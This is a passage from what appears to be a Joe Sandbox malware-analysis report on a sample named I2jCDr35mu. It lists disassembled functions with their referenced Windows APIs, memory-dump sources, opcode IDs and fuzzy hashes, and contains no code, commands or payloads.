                                                                                                                                                                                    • Opcode Fuzzy Hash: d48eddbb21eb184d498a610ab3f79080ba6dfd3efc5809743f6feb1af84b3d37
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51CFB1600601AFEB04CF18C998B5AFBF4FF88310F148269E4098B782D7B6E954CBD0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0009BD8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: fbb6490e4bd42159ab8221e9271531cef6b8c04bfd0be814ed236830e2c1e718
                                                                                                                                                                                    • Instruction ID: 3bb25f0af363f589bc8a6fd32345584aaf5e95e73a3ca2daeb15ec3b6edc1d19
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb6490e4bd42159ab8221e9271531cef6b8c04bfd0be814ed236830e2c1e718
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412672A001049BCF15EF68ED816AEB7E5EF44360F1406A9F805DB342DB71DD519BD1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0009BC31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 9cec1d7bce9c5a0d3b99e84623156c2a39a62e5174d8c42fd3ec4a6a6616dba8
                                                                                                                                                                                    • Instruction ID: 2206c456c8f669392a0dd884128e15d6de8cf847415a6e48bfad55e854f86694
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cec1d7bce9c5a0d3b99e84623156c2a39a62e5174d8c42fd3ec4a6a6616dba8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15411672A001089BCF15EF28ED806AEB7E5AF44320F140679F804DB286D770DE219BD1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 1819d569700762d0e87632a829e4eef5041ad79baed4d23d64e835174621f787
                                                                                                                                                                                    • Instruction ID: 3a09a56e352a3fbc3593d920b7a1707a7c6e4e8474621ff6da80cff6940f4bc5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1819d569700762d0e87632a829e4eef5041ad79baed4d23d64e835174621f787
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F316D72A006146FCF199F25DC406AEB7E8FF64361F14423AF8158B291D772EA90D7E0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: dd01383f41f06561f0b5f49abed7e644cc002e5cd6f7ef747c7c94312d3083d8
                                                                                                                                                                                    • Instruction ID: 49d032ef9a926892f04983829382ca886164a556b4bb9f6ebebb681eecf8d120
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd01383f41f06561f0b5f49abed7e644cc002e5cd6f7ef747c7c94312d3083d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210CFB24C2206EE34381855B947FA676EE7C7331B30407AF483C6646F3946A496172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00032B87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: e9bcf44a1bdffe34b9b9824670fbb32fa2c0043b41b69b3c347c12ef6391b937
                                                                                                                                                                                    • Instruction ID: bee64c02f81e6609d19bf958c78f3056a9991de498209f5d4bf9344d0db1918f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bcf44a1bdffe34b9b9824670fbb32fa2c0043b41b69b3c347c12ef6391b937
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41E372A000059FC719DF7CCD8596EBBEDEF95350B288668E819CB385EB70ED4187A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00032A42
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 8ab170e44ebbc933418f56c18018b750e45fd08bc0b246c6792573cc29b1cf9b
                                                                                                                                                                                    • Instruction ID: 4c729ae63499bf24bd80a1dd78bb51155bfb036adf6d5d21b198c87d2a751cbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab170e44ebbc933418f56c18018b750e45fd08bc0b246c6792573cc29b1cf9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D415C72A002049FC726DF6CD8806AEBBA9EF94350F1446B9E8589B342D731ED11C7D1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: c476368167b0a1ccc5bf39a1ec5989cad709aaeaec9cd2110b3d2d3402cce454
                                                                                                                                                                                    • Instruction ID: 58f9d72702a924315b5598442d3820ebee06a47a0d65857c140a2d1dc21263ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: c476368167b0a1ccc5bf39a1ec5989cad709aaeaec9cd2110b3d2d3402cce454
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75214BE724C2207EF20340405F90AFA6A6EE7C7731730806AF88797646F2D46A086172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00099591
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 683de2f2cae292e3b6cb8c50230ecd20031485c80ab28ee38cbdf0820e01ed37
                                                                                                                                                                                    • Instruction ID: 46579e2f5b048e614fcc229da33dbafb001313953b314671ec1ca7b2fef20153
                                                                                                                                                                                    • Opcode Fuzzy Hash: 683de2f2cae292e3b6cb8c50230ecd20031485c80ab28ee38cbdf0820e01ed37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 680145721005080BEF08A77CD84A96F73888F68360B44833DF82AC6682E724EA908755
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00122599,00000000,CF830579,00161148,0000000C,00122655,0011675D,?), ref: 00122708
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                    • Opcode ID: fbec76699fbe9008d39de39b88e11a770dcfc87b970ada30618a61288a2b2091
                                                                                                                                                                                    • Instruction ID: e1dd7e90218179422105beabaef533e5c52cd07e326fc790c856688077c0006f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbec76699fbe9008d39de39b88e11a770dcfc87b970ada30618a61288a2b2091
                                                                                                                                                                                    • Instruction Fuzzy Hash: 751148336065346ADA2932B47C46B6E3B4A9FA2B34F350219EC048F1E2DF719CA08270
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00160E00,0010C152,00000002,0010C152,00000000,?,?,?,0011BD06,00000000,?,0010C152,00000002,00160E00), ref: 0011BC38
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: ba383b678ccd7522308ecdf093f13f36654d9c76dd2a83b98e48a9d52e42cea4
                                                                                                                                                                                    • Instruction ID: 81e090fb0e3bd953c546b447abd360901fb1a17ef407c986d14e6a4aad09266e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba383b678ccd7522308ecdf093f13f36654d9c76dd2a83b98e48a9d52e42cea4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E012632604514AFCF1D9F59DC41DEE3B69EF91324B240258F8019B290EB71ED918BD0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00031FDE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2659868963-0
                                                                                                                                                                                    • Opcode ID: 35ee755df186a4ceb7bd7667f4debd103b2b45d849d4792f3bf6595cd84b8254
                                                                                                                                                                                    • Instruction ID: eca250daab4f2e8154fb8a32d037e46bc2dfca23549b329f3fccbf7a254b0888
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ee755df186a4ceb7bd7667f4debd103b2b45d849d4792f3bf6595cd84b8254
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601F93550030DB7CB28ABA8EC0189A7BDCEF15360B548635F658B7591FBB0F9908BD1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0009EBE4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 3778f179927231f2c5de00ecca252a97f7bc553f708e64cb0131690500e608d2
                                                                                                                                                                                    • Instruction ID: 4c1e1f62297a6f10a1d375572b61fff640b6fa3e3c73a6179cb06d75da05896b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3778f179927231f2c5de00ecca252a97f7bc553f708e64cb0131690500e608d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F027B24041480EEF18E360D946DAF73C88F60350B44457EF41EC7592EB25FDA9D596
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0010E21B,?,?,?,?,?,00032D8D,0010B29C,?,?,0010B29C), ref: 00124A00
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: 1ee0319173dd7d7fa584a63ebf044785c8d4094ff98f894cfbe609c62fed0cdf
                                                                                                                                                                                    • Instruction ID: 5f892de2f46fab04ab596f251c99b9f96219b52a39b54fc9a1d4141ee74d6f33
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ee0319173dd7d7fa584a63ebf044785c8d4094ff98f894cfbe609c62fed0cdf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE0223128277063EE3262A57D00BAB3649CF963B0F160222EC09970C0EB50DCA1C1E5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,0012C849,?,00000000,?,?,0012CAEA,?,00000007,?,?,0012CFDE,?,?), ref: 0012496A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                    • Opcode ID: b0568edd13026336fb68814391fa4c53399b91a1082c1d9aa112e22a0d7e83d8
                                                                                                                                                                                    • Instruction ID: 63bcab2ed1a6b38697b29d8df301826766abe5bc1db1938cc9b08b3d8c9163ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0568edd13026336fb68814391fa4c53399b91a1082c1d9aa112e22a0d7e83d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E0C232101628AADF253BB9BC05BDB7A4DDF0575AF150870FA088A850DB708DD0C2D4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,0011CCC3,00000016,00112143,?,?,E404CCD6,00112143,?), ref: 0011CCF4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    • Opcode ID: 8a3eb5522b78ebf00806079d230247652ad33ede768c01bb34dae5affe14f476
                                                                                                                                                                                    • Instruction ID: 3771c5bbaad433d9194b0f62e3e03d3769ab66d2cee1802f039eca2546da612a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a3eb5522b78ebf00806079d230247652ad33ede768c01bb34dae5affe14f476
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D0C7310802097FDE393B65DC06AED3F1ADF56794B5154247C5C16151CF31AD9599D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,0003646F,?,?,?,?,?,?,00150624,00000001), ref: 0010B4AD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2029273394-0
                                                                                                                                                                                    • Opcode ID: a52ae7b219eab01d03d52870e7b639012c1336aa59ede1e9acf744144a5755a7
                                                                                                                                                                                    • Instruction ID: 2b7af4f46e6fd26c98d5222a9c523c1a8c455d29fb5b80fe4684034600013e84
                                                                                                                                                                                    • Opcode Fuzzy Hash: a52ae7b219eab01d03d52870e7b639012c1336aa59ede1e9acf744144a5755a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EC0803114610C76DB5639718C408177648DF156547105010ED85D1052DB62D720A275
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 86abe2332c47893db94767dac458c5606e5948809e6f591dff469d825279a293
                                                                                                                                                                                    • Instruction ID: 3f8b29cb6bfcefbbc3fb58afe1368b3ed8b3b10d47a7766350fb2bb425b61666
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86abe2332c47893db94767dac458c5606e5948809e6f591dff469d825279a293
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41BDEB34C211BD7143A4862B64AF71A5EE5D7670332802EF887DA642F2C5AA4D7071
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
